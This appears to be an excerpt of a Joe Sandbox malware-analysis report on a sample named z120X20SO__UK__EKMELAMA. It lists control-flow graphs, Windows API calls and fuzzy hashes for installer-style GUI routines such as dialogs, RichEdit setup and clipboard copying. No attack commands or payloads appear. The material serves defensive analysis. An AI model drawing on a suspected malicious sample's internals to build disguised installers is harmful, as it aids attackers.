                                                                                                                                                              control_flow_graph 270 404b80-404bd0 GetDlgItem * 2 271 404bd6-404c70 GlobalAlloc LoadImageA SetWindowLongA ImageList_Create ImageList_AddMasked SendMessageA * 2 270->271 272 404dfd-404e04 270->272 275 404c72-404c7c SendMessageA 271->275 276 404c7e-404c87 DeleteObject 271->276 273 404e06-404e16 272->273 274 404e18 272->274 277 404e1b-404e24 273->277 274->277 275->276 278 404c89-404c91 276->278 279 404e26-404e29 277->279 280 404e2f-404e35 277->280 281 404c93-404c96 278->281 282 404cba-404cbe 278->282 279->280 284 404f13-404f1a 279->284 285 404e44-404e4b 280->285 286 404e37-404e3e 280->286 287 404c98 281->287 288 404c9b-404cb8 call 40618a SendMessageA * 2 281->288 282->278 283 404cc0-404cf0 call 40417b * 2 282->283 326 404cf6-404cfc 283->326 327 404dbf-404dd2 GetWindowLongA SetWindowLongA 283->327 293 404f8b-404f93 284->293 294 404f1c-404f22 284->294 289 404ec0-404ec3 285->289 290 404e4d-404e50 285->290 286->284 286->285 287->288 288->282 289->284 295 404ec5-404ecf 289->295 298 404e52-404e59 290->298 299 404e5b-404e70 call 404ace 290->299 296 404f95-404f9b SendMessageA 293->296 297 404f9d-404fa4 293->297 302 404f28-404f32 294->302 303 40517d-40518f call 4041e2 294->303 304 404ed1-404edd SendMessageA 295->304 305 404edf-404ee9 295->305 296->297 307 404fa6-404fad 297->307 308 404fd8-404fdf 297->308 298->289 298->299 299->289 325 404e72-404e83 299->325 302->303 311 404f38-404f47 SendMessageA 302->311 304->305 305->284 312 404eeb-404ef5 305->312 314 404fb6-404fbd 307->314 315 404faf-404fb0 ImageList_Destroy 307->315 318 404fe5-404ff1 call 4011ef 308->318 319 40513f-405146 308->319 311->303 320 404f4d-404f5e SendMessageA 311->320 321 404f06-404f10 312->321 322 404ef7-404f04 312->322 323 404fc6-404fd2 314->323 324 404fbf-404fc0 GlobalFree 314->324 315->314 344 405001-405004 318->344 345 404ff3-404ff6 318->345 319->303 331 405148-40514f 319->331 329 404f60-404f66 320->329 330 404f68-404f6a 320->330 321->284 322->284 323->308 324->323 325->289 334 404e85-404e87 325->334 335 404cff-404d04 326->335 333 404dd8-404ddb 327->333 329->330 337 404f6b-404f84 call 401299 SendMessageA 329->337 330->337 331->303 332 405151-40517b ShowWindow GetDlgItem ShowWindow 331->332 332->303 338 404df5-404df8 call 4041b0 333->338 339 404ddd-404df0 ShowWindow call 4041b0 333->339 340 404e89-404e90 334->340 341 404e9a 334->341 342 404da1-404db4 335->342 343 404d0a-404d35 335->343 337->293 338->272 339->303 352 404e92-404e94 340->352 353 404e96-404e98 340->353 354 404e9d-404eb9 call 40117d 341->354 342->335 347 404dba-404dbd 342->347 355 404d71-404d73 343->355 356 404d37-404d6f SendMessageA 343->356 348 405045-405069 call 4011ef 344->348 349 405006-40501f call 4012e2 call 401299 344->349 357 404ff8 345->357 358 404ff9-404ffc call 404b4e 345->358 347->327 347->333 371 40510b-405113 348->371 372 40506f 348->372 377 405021-405027 349->377 378 40502f-40503e SendMessageA 349->378 352->354 353->354 354->289 364 404d75-404d87 SendMessageA 355->364 365 404d89-404d9e SendMessageA 355->365 356->342 357->358 358->344 364->342 365->342 374 405121-405129 371->374 375 405115-40511b InvalidateRect 371->375 376 405072-40507d 372->376 374->319 381 40512b-40513a call 404aa1 call 404a89 374->381 375->374 379 4050f3-405105 376->379 380 40507f-40508e 376->380 384 405029 377->384 385 40502a-40502d 377->385 378->348 379->371 379->376 382 405090-40509d 380->382 383 4050a1-4050a4 380->383 381->319 382->383 387 4050a6-4050a9 383->387 388 4050ab-4050b4 383->388 384->385 385->377 385->378 390 4050b9-4050f1 SendMessageA * 2 387->390 388->390 391 4050b6 388->391 390->379 391->390
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404B97
                                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404BA4
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
                                                                                                                                                              • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404C0A
                                                                                                                                                              • SetWindowLongA.USER32(?,000000FC,00405192), ref: 00404C24
                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
                                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
                                                                                                                                                              • SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
                                                                                                                                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
                                                                                                                                                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
                                                                                                                                                              • DeleteObject.GDI32(00000110), ref: 00404C81
                                                                                                                                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
                                                                                                                                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
                                                                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
                                                                                                                                                              • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82
                                                                                                                                                                • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,?,00403FE0), ref: 004041BE
                                                                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
                                                                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00404DC4
                                                                                                                                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DD2
                                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404DE2
                                                                                                                                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
                                                                                                                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
                                                                                                                                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
                                                                                                                                                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
                                                                                                                                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
                                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404FB0
                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00404FC0
                                                                                                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
                                                                                                                                                              • SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
                                                                                                                                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
                                                                                                                                                              • InvalidateRect.USER32(?,00000000,?), ref: 0040511B
                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00405169
                                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405174
                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 0040517B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                              • String ID: $M$N
                                                                                                                                                              • API String ID: 2564846305-813528018
                                                                                                                                                              • Opcode ID: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
                                                                                                                                                              • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                                                                                                                              • Opcode Fuzzy Hash: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
                                                                                                                                                              • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 393 40535c-405378 394 405507-40550d 393->394 395 40537e-405445 GetDlgItem * 3 call 4041b0 call 404aa1 GetClientRect GetSystemMetrics SendMessageA * 2 393->395 396 405537-405543 394->396 397 40550f-405531 GetDlgItem CreateThread CloseHandle 394->397 413 405463-405466 395->413 414 405447-405461 SendMessageA * 2 395->414 399 405565-40556b 396->399 400 405545-40554b 396->400 397->396 405 4055c0-4055c3 399->405 406 40556d-405573 399->406 403 405586-40558d call 4041e2 400->403 404 40554d-405560 ShowWindow * 2 call 4041b0 400->404 417 405592-405596 403->417 404->399 405->403 408 4055c5-4055cb 405->408 410 405575-405581 call 404154 406->410 411 405599-4055a9 ShowWindow 406->411 408->403 415 4055cd-4055e0 SendMessageA 408->415 410->403 418 4055b9-4055bb call 404154 411->418 419 4055ab-4055b4 call 40521e 411->419 421 405476-40548d call 40417b 413->421 422 405468-405474 SendMessageA 413->422 414->413 423 4055e6-405612 CreatePopupMenu call 40618a AppendMenuA 415->423 424 4056dd-4056df 415->424 418->405 419->418 432 4054c3-4054e4 GetDlgItem SendMessageA 421->432 433 40548f-4054a3 ShowWindow 421->433 422->421 430 405614-405624 GetWindowRect 423->430 431 405627-40563d TrackPopupMenu 423->431 424->417 430->431 431->424 434 405643-40565d 431->434 432->424 437 4054ea-405502 SendMessageA * 2 432->437 435 4054b2 433->435 436 4054a5-4054b0 ShowWindow 433->436 438 405662-40567d SendMessageA 434->438 439 4054b8-4054be call 4041b0 435->439 436->439 437->424 438->438 440 40567f-40569f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 438->440 439->432 442 4056a1-4056c1 SendMessageA 440->442 442->442 443 4056c3-4056d7 GlobalUnlock SetClipboardData CloseClipboard 442->443 443->424
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004053BB
                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004053CA
                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00405407
                                                                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 0040540E
                                                                                                                                                              • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
                                                                                                                                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
                                                                                                                                                              • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
                                                                                                                                                              • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
                                                                                                                                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
                                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004054AA
                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004054CB
                                                                                                                                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
                                                                                                                                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
                                                                                                                                                              • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
                                                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 004053D9
                                                                                                                                                                • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,?,00403FE0), ref: 004041BE
                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040551C
                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000052F0,00000000), ref: 0040552A
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405531
                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00405554
                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040555B
                                                                                                                                                              • ShowWindow.USER32(00000008), ref: 004055A1
                                                                                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
                                                                                                                                                              • CreatePopupMenu.USER32 ref: 004055E6
                                                                                                                                                              • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004055FB
                                                                                                                                                              • GetWindowRect.USER32(?,000000FF), ref: 0040561B
                                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
                                                                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 00405680
                                                                                                                                                              • EmptyClipboard.USER32 ref: 00405686
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405699
                                                                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004056C6
                                                                                                                                                              • SetClipboardData.USER32(?,00000000), ref: 004056D1
                                                                                                                                                              • CloseClipboard.USER32 ref: 004056D7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 590372296-0
                                                                                                                                                              • Opcode ID: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
                                                                                                                                                              • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                                                                                                                              • Opcode Fuzzy Hash: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
                                                                                                                                                              • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 444 403ca7-403cb9 445 403dfa-403e09 444->445 446 403cbf-403cc5 444->446 447 403e58-403e6d 445->447 448 403e0b-403e53 GetDlgItem * 2 call 40417b SetClassLongA call 40140b 445->448 446->445 449 403ccb-403cd4 446->449 453 403ead-403eb2 call 4041c7 447->453 454 403e6f-403e72 447->454 448->447 450 403cd6-403ce3 SetWindowPos 449->450 451 403ce9-403cec 449->451 450->451 455 403d06-403d0c 451->455 456 403cee-403d00 ShowWindow 451->456 466 403eb7-403ed2 453->466 458 403e74-403e7f call 401389 454->458 459 403ea5-403ea7 454->459 461 403d28-403d2b 455->461 462 403d0e-403d23 DestroyWindow 455->462 456->455 458->459 481 403e81-403ea0 SendMessageA 458->481 459->453 465 404148 459->465 472 403d2d-403d39 SetWindowLongA 461->472 473 403d3e-403d44 461->473 469 404125-40412b 462->469 471 40414a-404151 465->471 467 403ed4-403ed6 call 40140b 466->467 468 403edb-403ee1 466->468 467->468 477 404106-40411f DestroyWindow EndDialog 468->477 478 403ee7-403ef2 468->478 469->465 476 40412d-404133 469->476 472->471 479 403de7-403df5 call 4041e2 473->479 480 403d4a-403d5b GetDlgItem 473->480 476->465 482 404135-40413e ShowWindow 476->482 477->469 478->477 483 403ef8-403f45 call 40618a call 40417b * 3 GetDlgItem 478->483 479->471 484 403d7a-403d7d 480->484 485 403d5d-403d74 SendMessageA IsWindowEnabled 480->485 481->471 482->465 514 403f47-403f4c 483->514 515 403f4f-403f8b ShowWindow EnableWindow call 40419d EnableWindow 483->515 488 403d82-403d85 484->488 489 403d7f-403d80 484->489 485->465 485->484 493 403d93-403d98 488->493 494 403d87-403d8d 488->494 492 403db0-403db5 call 404154 489->492 492->479 495 403d9a-403da0 493->495 496 403dce-403de1 SendMessageA 493->496 494->496 499 403d8f-403d91 494->499 500 403da2-403da8 call 40140b 495->500 501 403db7-403dc0 call 40140b 495->501 496->479 499->492 510 403dae 500->510 501->479 511 403dc2-403dcc 501->511 510->492 511->510 514->515 518 403f90 515->518 519 403f8d-403f8e 515->519 520 403f92-403fc0 GetSystemMenu EnableMenuItem SendMessageA 518->520 519->520 521 403fc2-403fd3 SendMessageA 520->521 522 403fd5 520->522 523 403fdb-404015 call 4041b0 call 403c88 call 4060f7 lstrlenA call 40618a SetWindowTextA call 401389 521->523 522->523 523->466 534 40401b-40401d 523->534 534->466 535 404023-404027 534->535 536 404046-40405a DestroyWindow 535->536 537 404029-40402f 535->537 536->469 539 404060-40408d CreateDialogParamA 536->539 537->465 538 404035-40403b 537->538 538->466 540 404041 538->540 539->469 541 404093-4040ea call 40417b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 539->541 540->465 541->465 546 4040ec-404104 ShowWindow call 4041c7 541->546 546->469
                                                                                                                                                              APIs
                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                                                                                                                              • ShowWindow.USER32(?), ref: 00403D00
                                                                                                                                                              • DestroyWindow.USER32 ref: 00403D14
                                                                                                                                                              • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D30
                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403D51
                                                                                                                                                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403E1A
                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403E24
                                                                                                                                                              • SetClassLongA.USER32(?,000000F2,?), ref: 00403E3E
                                                                                                                                                              • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403E8F
                                                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403F35
                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00403F68
                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00403F83
                                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403F99
                                                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00403FA0
                                                                                                                                                              • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403FB8
                                                                                                                                                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
                                                                                                                                                              • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                                                                                                                              • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 184305955-0
                                                                                                                                                              • Opcode ID: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
                                                                                                                                                              • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                                                                                                                              • Opcode Fuzzy Hash: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
                                                                                                                                                              • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 549 40390a-403922 call 406500 552 403924-403934 call 406055 549->552 553 403936-403967 call 405fde 549->553 562 40398a-4039b3 call 403bcf call 405b7d 552->562 558 403969-40397a call 405fde 553->558 559 40397f-403985 lstrcatA 553->559 558->559 559->562 567 4039b9-4039be 562->567 568 403a3a-403a42 call 405b7d 562->568 567->568 569 4039c0-4039e4 call 405fde 567->569 574 403a50-403a75 LoadImageA 568->574 575 403a44-403a4b call 40618a 568->575 569->568 576 4039e6-4039e8 569->576 578 403af6-403afe call 40140b 574->578 579 403a77-403aa7 RegisterClassA 574->579 575->574 580 4039f9-403a05 lstrlenA 576->580 581 4039ea-4039f7 call 405aba 576->581 593 403b00-403b03 578->593 594 403b08-403b13 call 403bcf 578->594 582 403bc5 579->582 583 403aad-403af1 SystemParametersInfoA CreateWindowExA 579->583 587 403a07-403a15 lstrcmpiA 580->587 588 403a2d-403a35 call 405a8f call 4060f7 580->588 581->580 586 403bc7-403bce 582->586 583->578 587->588 592 403a17-403a21 GetFileAttributesA 587->592 588->568 597 403a23-403a25 592->597 598 403a27-403a28 call 405ad6 592->598 593->586 602 403b19-403b33 ShowWindow call 406492 594->602 603 403b9c-403ba4 call 4052f0 594->603 597->588 597->598 598->588 610 403b35-403b3a call 406492 602->610 611 403b3f-403b51 GetClassInfoA 602->611 608 403ba6-403bac 603->608 609 403bbe-403bc0 call 40140b 603->609 608->593 612 403bb2-403bb9 call 40140b 608->612 609->582 610->611 615 403b53-403b63 GetClassInfoA RegisterClassA 611->615 616 403b69-403b9a DialogBoxParamA call 40140b call 40385a 611->616 612->593 615->616 616->586
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                                                                                                                • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                                                                                                              • lstrcatA.KERNEL32(00436000,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,74DF3410,00436400,00435000,00000000), ref: 00403985
                                                                                                                                                              • lstrlenA.KERNEL32(0042E3C0,?,?,?,0042E3C0,00000000,00435400,00436000,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,74DF3410), ref: 004039FA
                                                                                                                                                              • lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                                                                                                                              • GetFileAttributesA.KERNEL32(0042E3C0), ref: 00403A18
                                                                                                                                                              • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,00435400), ref: 00403A61
                                                                                                                                                                • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                                                                                                              • RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                                                                                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                                                                                                                              • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AEB
                                                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                                                                                                                              • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBC0), ref: 00403B4D
                                                                                                                                                              • GetClassInfoA.USER32(00000000,RichEdit,0042EBC0), ref: 00403B5A
                                                                                                                                                              • RegisterClassA.USER32(0042EBC0), ref: 00403B63
                                                                                                                                                              • DialogBoxParamA.USER32(?,00000000,00403CA7,00000000), ref: 00403B82
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                              • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                              • API String ID: 1975747703-2904746566
                                                                                                                                                              • Opcode ID: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
                                                                                                                                                              • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                                                                                                                              • Opcode Fuzzy Hash: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
                                                                                                                                                              • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 623 4042e6-4042f6 624 404408-40441b 623->624 625 4042fc-404304 623->625 628 404477-40447b 624->628 629 40441d-404426 624->629 626 404306-404315 625->626 627 404317-4043af call 40417b * 2 CheckDlgButton call 40419d GetDlgItem call 4041b0 SendMessageA 625->627 626->627 663 4043b1-4043b4 GetSysColor 627->663 664 4043ba-404403 SendMessageA * 2 lstrlenA SendMessageA * 2 627->664 631 404541-404548 628->631 632 404481-404495 GetDlgItem 628->632 633 404550 629->633 634 40442c-404434 629->634 631->633 636 40454a 631->636 638 404497-40449e 632->638 639 4044ff-404506 632->639 637 404553-40455a call 4041e2 633->637 634->633 640 40443a-404446 634->640 636->633 648 40455f-404563 637->648 638->639 644 4044a0-4044bb 638->644 639->637 645 404508-40450f 639->645 640->633 641 40444c-404472 GetDlgItem SendMessageA call 40419d call 404566 640->641 641->628 644->639 649 4044bd-4044fc SendMessageA LoadCursorA SetCursor call 40458a LoadCursorA SetCursor 644->649 645->637 650 404511-404515 645->650 649->639 654 404517-404526 SendMessageA 650->654 655 404528-40452c 650->655 654->655 656 40453c-40453f 655->656 657 40452e-40453a SendMessageA 655->657 656->648 657->656 663->664 664->648
                                                                                                                                                              APIs
                                                                                                                                                              • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404371
                                                                                                                                                              • GetDlgItem.USER32(00000000,000003E8), ref: 00404385
                                                                                                                                                              • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 004043A3
                                                                                                                                                              • GetSysColor.USER32(?), ref: 004043B4
                                                                                                                                                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
                                                                                                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 004043D5
                                                                                                                                                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
                                                                                                                                                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
                                                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040445B
                                                                                                                                                              • SendMessageA.USER32(00000000), ref: 0040445E
                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404489
                                                                                                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
                                                                                                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 004044D8
                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004044E1
                                                                                                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 004044F7
                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004044FA
                                                                                                                                                              • SendMessageA.USER32(00000111,?,00000000), ref: 00404526
                                                                                                                                                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
